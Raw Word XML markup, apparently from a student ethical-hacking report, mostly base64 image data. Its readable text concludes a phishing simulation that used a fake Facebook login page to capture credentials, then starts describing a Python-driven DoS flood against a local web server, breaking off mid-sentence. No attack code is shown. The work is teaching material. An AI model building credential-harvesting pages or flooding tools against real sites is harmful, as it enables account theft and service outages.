9ubV0LSQSNE+0ZG5Tg/yruPh5&#10;rN/4e8FeOL3TruaxvI47MLNAxV1zPg8j2JFc/p3xC8R6NJdtp2s3eni7ma4mS2lKKznqcCtrwfqN&#10;rq+h+MbPVdat9PvtVEEi3N/5hWR1m3uSUVjk/Tqa+dPQxCnKm1USavHu+qvpb17mj+zn8Lo/i/8A&#10;F3RtFv5PI0KEtqOs3THCwWMI8ydmb+HKjaD6uK6bxP8ABy9+K32n4ieCrPSNO8K694x/4RvTtDtW&#10;kWayll5gEibNqoVKcqx5bAUdBH4J8eaD8Nv2bvGMGmaik3j7xheJo88MaMHsdJjAkkO4gA+c5CED&#10;PyjsRiug/ZH/AGlvDnwMtfEdh4u0nUNa0y6ntNV02KwSNjBqFs7NG7b3XCtkAkZPyjiod90ekYWi&#10;fsm6xrvjvXfB8fjnwNaa/pepnR1tLzVnie9uQBlLdTFuf5jsyQvzAimeBP2Q/GnxA07xfcWeoaBp&#10;914S1P8AszW9P1K+MM1lhirTu2wxiFSsuW35/dPgHAz6L8Cf2xPD/wANfA80Or2PiKPxYfEjeIbi&#10;+8PywQrrQPzfZryVwXEW7OVUHI9MmorD9oz4Y3Wh/H211KHxhZz/ABK1YXkBsba1kFtDHK08Ydmm&#10;U7mklkVgAwChcEnNK8g0OD+H37Nt3c/tMn4b+IryzkstCuHuPEGoWUjm2is4FEk7B2VWAx8mSowz&#10;Cn+PfgfrnxD+0fEXwPoFgnhLXJNX1Gz0fTHKy6ZZWUqLI0yOAq/LIjAIzZycAcCovB3xC0X4f/s5&#10;eM1sdUF18QvGd6mkXMeH8yy0pAJJSXIwTM5CEAnKjsRXefs9ftY+E/hb8H4PCXiDS9Yvb1dXm8yW&#10;xiiaI6XP9na4iBaRT5haA4GNvTLUO+4aHI/En9iP4j/DdICf7K8SO1peX1xHolw7tZw2qQvM0vmx&#10;xjgXEfC7iefxPiT+xH8R/hukBP8AZXiR2tLy+uI9EuHdrOG1SF5ml82OMcC4j4XcTz+Ptlr+3t4L&#10;uH8TNqmjeIJ/7U8S3M8RjggO3Rp/s3mQtmbiU/Zh8oyvT5qLX9vbwXcP4mbVNG8QT/2p4luZ4jHB&#10;AdujT/ZvMhbM3Ep+zD5RlenzUryDQ8Q8F/sv38P7TUHw18T3lk9rpAj1HX76xkc28FisCXEpLsqk&#10;HYwTOOHbv1r0vTPgF4W/aK+E2veLfB2n6F4N1nUviK+laZLqeoSWltDYNboYbZYwWVpHkkThULZJ&#10;xhQcYnxE/aC8Man4R+L3inQLyUeMfiNrX9nC0njKXGn6JGqsd5GV3TEIjKrMML1yK5j4U/tC+HPA&#10;vwf8KeFL+y1SbUdK+I9n4wnltoo2iaziijRkUmQEykocAgL0+YU9XqGhr/DD9jm28TeH/io3ijxj&#10;pHhzXfB0j2n2WW8KxwTJJsaW5IhfEDdFZCSSDkCsDwb+xp4r8c+ER4m07xR4Pi0hnvgk17qjwb47&#10;SQJNMN8QzGA2/d2UfNtJAPQ6D+0t4Kk+Jfxsm8QaXrz+CviN5qltNEC6jajzjJGdrsY8/MQRuPbr&#10;U2m/tKeAvDnwpPgzStP8RmC30/xLYWsl5FAzbb/yxbb2WQZKhP3hCj/ZB7HvBoafhL4EeHNC8NfG&#10;3wX408HWM/jrwJoc+pReIrPVLsiSQqGixEGWMqFZSMpk9xXhXwL1q/074g6dZ2t5Nb2t65W5hjch&#10;ZgqOQGHfGTXudx+1h4H1j48fF7XtU0nxA3gf4gaONJkW0WBNStsQxJvCs7RnlH43HqD6ivEPh/L4&#10;c034lzatb6t/Znh+xupHs01cMbuWBg4QHylKbwNu7kDJ4qo3vqceNSlh5pq+j6X9O55zRRRTOsKK&#10;KKACiiigAooooAKryr5tysbZ2Bd2PWrFMlhWUgklWHQqcGgCFibZcIwfLgbT2pHuXRiuF3KOeCc/&#10;SpRbIFA54bdnPJNK9ursWyykjB2nGaAIZbtlOQFxgHBzn/61BmZJZWJyoUHbUj2iOWOWGRggHinG&#10;3UkkknK7SPWgBkE7SPtYDpnIBH86S4uGiYhduAM4PJNSRwiM53Mxxj5j0pJLZZGYksNwwQD1oAS4&#10;bdasfVc1BEuJI2jRkAHzE8A8VaaINF5ZJxjGe9O2DZs6jGKAKyXbF8MFIwT8ue1KtzJuj3KoVwTx&#10;1xinraqpBBZiAQAx4+lRxW7CVCVIVQeC2fyoAWG6aR1BUYb0B4p8vEyE4wFJxinR26xsCCxA6Ang&#10;U4oGYMewIxQBH5rqAWC4YEjHbjNSRMzIGbGTzxTRAB3YgDABPSnhQFC9gMUAQxzs0ig7SDn7uePx&#10;p7u2/YmM4ySaFgClTuY7emaV4g5ByVPTIoAjadwSAuCACRgnn8KQylHcgcttGCOnFSG3XsWUYwcH&#10;qKUwKc9RnHTtigCFpHbZx8wfgkEA8GnGZw2zC7t2M9umaebcEcs2c7t2ec0CFQQckkHdk9+MUARl&#10;m3DBC/vMHA68U9JmZlXA3ZO72x/kU4wg55IO7dn3pscZEkjkbS3QZoAfN/qn/wB01F5rxqNwXlSR&#10;jtgVKEJj2sc5GCaaLdQMFmIxgZPSgBrSuqrkqC3PQn9KRZnk2BQoLKSc1I0QJUglSBjI9KEhEZBB&#10;JwCBmgBiyvJgKFB25OaIn2WoYjoucU7yAMYZgQMZB6inLEqx7Oq4xzQBG0rxg7gpO0sMe1PO4xMW&#10;xnB6Un2cYILM2Rt5PQU8jK47YxQBAkroiZC4K8Y7cU9pWGzAySpbHvxSrbquOWYAYAJ6Ugt1HVmb&#10;jaMnoKAGecWjbO1sY4wR39Kd5r5Jwu0Pt9+uKd9nBzlmYnHJ+uaXyhtIyeW3frmgCNZ2ZshcrnGN&#10;p/PPStXwe5fxXZFhgjeMf8Aas3yQGzlsZztzxmtTwimzxXYgEkYfr2+RqYHaeN/+RXvf+Af+hrX2&#10;b/wTi/5IlqX/AGHp/wD0RBXxl43/AORXvf8AgH/oa19m/wDBOL/kiWpf9h6f/wBEQVE9ho+uqKKK&#10;xGef/Htf+LP+O/8AsA3/AP6TvX5L/Dn/AJDM/wD2CNS/9IJ6/W74+R/8Wd8eH/qA3/8A6TvX5B+E&#10;Nbh8P6ml3cWz3lu1rcW0kMUwicrNA8RIcqwBAfPKnpWsDCunKnJLe3+RlV1fhLwhFrGm3mpXtzHb&#10;WUYkiVmDE+YIy2cL2A59+lQ/b/B//QC1z/wdQ/8AyJXSeAbq2S7v3sL6Ox0p0cyaVqcwmbaEHzlh&#10;GqsM5zgAgYBzX0OSUaNfHQp1480Wn1sr20b1V0t2k79tjysxr1YYaUqV4tW6eeqVuazfRtW77nnd&#10;1CtvcyxLKk6oxUSx52tjuM4OKirS8RyWMuu3z6auyxMrGEYwNvsOw9Kza8itBU6s4RaaTa01Wje3&#10;l2PVpSc6cZNWulvvt1CiiisDUKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK&#10;KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAoooo&#10;AKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAK0fCn/I2WP0&#10;f/0Bqzq0fCpC+LLEk44cf+ONTA7Pxv8A8ive/wDAP/Q1r7P/AOCcIz8EdS/7D0//AKIt6+L/ABww&#10;Hhi8BOCdgH/fa19qf8E3E3fBDUz/ANR6f/0Rb1Etho+tcGipfLorEZl+PfC8fi3wprWiSuYotTsp&#10;7N3AyVEkZQn8N1fjv8UfhL4l+FPiG607WtImtFSVlidMtHIueCjcblxjkD24IIH7YXUSkHNYt3bI&#10;c1UZWA/DPEv/AD7zf98GnxTXMBYxxXMZZShKqRlTwQfY1+2s1omaqPZx+lWqjTuhOKejPxSxL/z7&#10;zf8AfBoxL/z7zf8AfBr9qvscfpR9jj9KXP5BY/FXEv8Az7zf98GjEv8Az7zf98Gv2q+xx+lH2OP0&#10;o5/ILH4q4l/595v++DRiX/n3m/74NftV9jj9KPscfpRz+QWPxVxL/wA+83/fBoxL/wA+83/fBr9q&#10;vscfpR9jj9KOfyCx+KuJf+feb/vg0Yl/595v++DX7VfY4/Sj7HH6Uc/kFj8VcS/8+83/AHwaMS/8&#10;+83/AHwa/ar7HH6UfY4/Sjn8gsfiriX/AJ95v++DRiX/AJ95v++DX7VfY4/Sj7HH6Uc/kFj8VcS/&#10;8+83/fBoxL/z7zf98Gv2q+xx+lH2OP0o5/ILH4q4l/595v8Avg0Yl/595v8Avg1+1X2OP0o+xx+l&#10;HP5BY/FXEv8Az7zf98GjEv8Az7zf98Gv2q+xx+lH2OP0o5/ILH4q4l/595v++DRiX/n3m/74NftV&#10;9jj9KPscfpRz+QWPxVxL/wA+83/fBoxL/wA+83/fBr9qvscfpR9jj9KOfyCx+KuJf+feb/vg0Yl/&#10;595v++DX7VfY4/Sj7HH6Uc/kFj8VcS/8+83/AHwaMS/8+83/AHwa/ar7HH6UfY4/Sjn8gsfiriX/&#10;AJ95v++DRiX/AJ95v++DX7VfY4/Sj7HH6Uc/kFj8VcS/8+83/fBoxL/z7zf98Gv2q+xx+lH2OP0o&#10;5/ILH4q4l/595v8Avg0Yl/595v8Avg1+1X2OP0o+xx+lHP5BY/FXEv8Az7zf98GjEv8Az7zf98Gv&#10;2q+xx+lH2OP0o5/ILH4q4l/595v++DRiX/n3m/74NftV9jj9KPscfpRz+QWPxVxL/wA+83/fBoxL&#10;/wA+83/fBr9qvscfpR9jj9KOfyCx+KuJf+feb/vg0Yl/595v++DX7VfY4/Sj7HH6Uc/kFj8VcS/8&#10;+83/AHwaMS/8+83/AHwa/ar7HH6UfY4/Sjn8gsfiriX/AJ95v++DRiX/AJ95v++DX7VfY4/Sj7HH&#10;6Uc/kFj8VcS/8+83/fBoxL/z7zf98Gv2q+xx+lH2OP0o5/ILH4q4l/595v8Avg0Yl/595v8Avg1+&#10;1X2OP0o+xx+lHP5BY/FXEv8Az7zf98GjEv8Az7zf98Gv2q+xx+lH2OP0o5/ILH4q4l/595v++DRi&#10;X/n3m/74NftV9jj9KPscfpRz+QWPxVxL/wA+83/fBoxL/wA+83/fBr9qvscfpR9jj9KOfyCx+KuJ&#10;f+feb/vg0Yl/595v++DX7VfY4/Sj7HH6Uc/kFj8VcS/8+83/AHwaMS/8+83/AHwa/ar7HH6UfY4/&#10;Sjn8gsfiriX/AJ95v++DRiX/AJ95v++DX7VfY4/Sj7HH6Uc/kFj8VcS/8+83/fBoxL/z7zf98Gv2&#10;q+xx+lH2OP0o5/ILH4q4l/595v8Avg0Yl/595v8Avg1+1X2OP0o+xx+lHP5BY/FXEv8Az7zf98Gj&#10;Ev8Az7zf98Gv2q+xx+lH2OP0o5/ILH4q4l/595v++DRiX/n3m/74NftV9jj9KPscfpRz+QWPxVxL&#10;/wA+83/fBoxL/wA+83/fBr9qvscfpR9jj9KOfyCx+KuJf+feb/vg0Yl/595v++DX7VfY4/Sj7HH6&#10;Uc/kFj8VcS/8+83/AHwaMS/8+83/AHwa/ar7HH6UfY4/Sjn8gsfiriX/AJ95v++DUTx3InSWKKeN&#10;1wQwUgg+or9sVs489KsRWiZo532Cx+MFjp/ifx7fQaZbQXWo3DEeXBHHyx9lAyx+gJr9U/2Qvg/f&#10;fB/4Q2WlapGINVvJmv7uBW3CKRkRdue5xGpPoSRzjNevWtqmRW1aQqKUpXHYTyPrRV7YKKjUD//Z&#10;UEsDBBQABgAIAAAAIQA1XP3e3QAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXvgv9h&#10;GcGb3cRYqTGbUop6KkJbQbxNk2kSmp0N2W2S/ntHL3p5MLzhve9ly8m2aqDeN44NxLMIFHHhyoYr&#10;Ax/717sFKB+QS2wdk4ELeVjm11cZpqUbeUvDLlRKQtinaKAOoUu19kVNFv3MdcTiHV1vMcjZV7rs&#10;cZRw2+r7KHrUFhuWhho7WtdUnHZna+BtxHGVxC/D5nRcX7728/fPTUzG3N5Mq2dQgabw9ww/+IIO&#10;uTAd3JlLr1oDMiT8qnjz5ElmHAwki+QBdJ7p//T5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4d8Rm3IDAABsCAAADgAAAAAAAAAAAAAAAAA8AgAAZHJzL2Uyb0Rv&#10;Yy54bWxQSwECLQAKAAAAAAAAACEAEvtAvW21AABttQAAFQAAAAAAAAAAAAAAAADaBQAAZHJzL21l&#10;ZGlhL2ltYWdlMS5qcGVnUEsBAi0AFAAGAAgAAAAhADVc/d7dAAAABQEAAA8AAAAAAAAAAAAAAAAA&#10;ersAAGRycy9kb3ducmV2LnhtbFBLAQItABQABgAIAAAAIQBYYLMbugAAACIBAAAZAAAAAAAAAAAA&#10;AAAAAIS8AABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfQEAAHW9AAAAAA==&#10;">
                <v:shape id="Image 29" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:95;top:94;width:34087;height:24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61WxAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvujEUsamrBNvG0ptpKT0+ss8kmH0bd1eN/75bEHocZuYbZrUZTCcu5HxrWcF8loAg&#10;rqxuuVbw9fk2XYLwAVljZ5kU3MjDZj16WGGm7ZX3dClDLSKEfYYKmhD6TEpfNWTQz2xPHL2DdQZD&#10;lK6W2uE1wk0n0yRZSIMtx4UGe9o2VB3Ls1Gw+3ksupeT5GVuv0+3D1e48rVQajIe8mcQgYbwH763&#10;37WC9An+vsQfINe/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIPbrVbEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;">
                  <v:imagedata r:id="rId29" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 30" o:spid="_x0000_s1028" style="position:absolute;left:47;top:47;width:34182;height:24251;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3418204,242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D1BvgAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0P+A/hCu7GVJ3xUY0i4qjgytf+0lzbYnNTmqjx781CmOXhvGeLYCrxoMaVlhX0ugkI4szqknMF&#10;59Pf9xiE88gaK8uk4EUOFvPW1wxTbZ98oMfR5yKGsEtRQeF9nUrpsoIMuq6tiSN3tY1BH2GTS93g&#10;M4abSvaTZCgNlhwbCqxpVVB2O96Ngp9gfjej7aX/WiPydRQmYZ9NlOq0w3IKwlPw/+KPe6cVDOL6&#10;+CX+ADl/AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAAAAAA&#10;AAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJToPUG+AAAA2wAAAA8AAAAAAAAA&#10;AAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAADyAgAAAAA=&#10;" path="m,2425065r3418204,l3418204,,,,,2425065xe" filled="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C67BB" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD43C89" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>This project successfully demonstrated how phishing attacks work by creating a fake Facebook login page in a controlled environment to capture user credentials. It highlighted the techniques used by attackers to exploit trust, such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mimicking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>legitimate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>websites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>redirecting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fraudulent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>pages.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Through</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simulation,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gained insights into the risks posed by phishing and the importance of preventive measures, including verifying URLs, avoiding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>suspicious</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>links,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>enabling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>two-factor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>underscores</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>critical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ethical hacking in identifying vulnerabilities and educating users to strengthen cybersecurity practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C23382C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>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E2ED91C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="188"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064BDB05" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Denial of Service (DoS) attack </w:t>
      </w:r>
      <w:r>
        <w:t>is a cyberattack aimed at overwhelming a server, service, or network with excessive requests, rendering it unable to process legitimate traffic. In this case, the attack targets a locally hosted web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>flood</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>requests,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>resources</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exhausted. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E0C1C" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="10"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>demonstrate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>overwhelmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>made</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>unresponsive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
